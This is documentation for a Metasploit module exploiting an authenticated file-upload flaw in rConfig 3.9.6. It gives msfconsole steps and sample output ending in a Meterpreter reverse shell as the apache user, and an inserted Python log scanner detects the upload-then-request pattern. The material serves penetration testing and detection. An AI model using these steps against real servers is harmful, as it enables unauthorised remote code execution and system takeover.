metasploit-gs/documentation/modules/exploit/linux/http/rconfig_authenticated_rce.md
2021-06-17 15:19:42 +02:00

Vulnerable Application

Description

This module allows an attacker with a privileged rConfig account to start a reverse shell by exploiting an arbitrary file upload vulnerability in /lib/crud/vendors.crud.php. The uploaded payload is then triggered by a request to images/vendor/<payload_file>.php.
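
A defender's view of the two requests described above, as an added example that is not part of the module or its documentation: it scans web-server access logs for a POST to vendors.crud.php followed by a request for a script under images/vendor/. The Apache combined log format, the sample lines, the 10-minute window and the function name are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jun/2021:14:40:58 +0200] "POST /lib/crud/vendors.crud.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
203.0.113.7 - - [17/Jun/2021:14:40:59 +0200] "GET /images/vendor/uaxsv.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Jun/2021:14:45:10 +0200] "POST /lib/crud/vendors.crud.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
198.51.100.4 - - [17/Jun/2021:14:45:12 +0200] "GET /images/vendor/cisco.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [17/Jun/2021:15:02:00 +0200] "GET /rconfig/images/vendor/x.PHP?a=1 HTTP/1.1" 404 196 "-" "curl/7.0"
"""

# client, timestamp, method, request target, status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Suffix matches so a non-root TARGETURI (e.g. /rconfig/) is still covered.
UPLOAD = re.compile(r'/lib/crud/vendors\.crud\.php$', re.I)
SCRIPT = re.compile(r'/images/vendor/[^/]+\.(?:php\d?|phtml|phar)$', re.I)


def find_upload_then_execute(log_text, window=timedelta(minutes=10)):
    """Report every request for a script under images/vendor/. A hit is marked
    'upload-then-request' when the same client POSTed to vendors.crud.php
    within `window` beforehand, otherwise 'script-request'."""
    last_upload = {}  # client IP -> time of its latest POST to the upload endpoint
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, target, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        path = target.split("?", 1)[0]  # ignore the query string
        if method == "POST" and UPLOAD.search(path):
            last_upload[ip] = when
        elif SCRIPT.search(path):
            prior = last_upload.get(ip)
            correlated = prior is not None and timedelta(0) <= when - prior <= window
            findings.append({
                "client": ip, "path": path, "status": int(status),
                "kind": "upload-then-request" if correlated else "script-request",
            })
    return findings


if __name__ == "__main__":
    for finding in find_upload_then_execute(SAMPLE_LOG):
        print(finding)
```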

Installation

Vulnerable versions of rConfig can be downloaded from here. Then follow this installation guide. You can also use this docker file (as long as it has not been updated and still provides rConfig 3.9.6).

Verification Steps

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. use exploit/linux/http/rconfig_authenticated_rce
  3. set USERNAME <admin_username>
  4. set PASSWORD <admin_password>
  5. set TARGETURI <base_path_rconfig> if the base path of rConfig web server is different from /
  6. check to check if the targeted rConfig server is vulnerable
  7. run the module to exploit the vulnerability and start a reverse shell

Options

USERNAME

Set the USERNAME of your admin account.

PASSWORD

Set the PASSWORD of your admin account.

Scenarios

This module was successfully tested on CentOS 7 with rConfig 3.9.6. See the following output:

msf6 exploit(rconfig_authenticated_rce) > run

[*] Started reverse TCP handler on X.X.X.X:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 3.9.6 of rConfig found !
[+] The target is vulnerable.
[+] We successfully logged in !
[*] Uploading file 'uaxsv.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to Y.Y.Y.Y
[*] Meterpreter session 13 opened (X.X.X.X:4444 -> Y.Y.Y.Y:38310) at 2021-06-17 14:41:00 +0200

meterpreter > getuid
Server username: apache (48)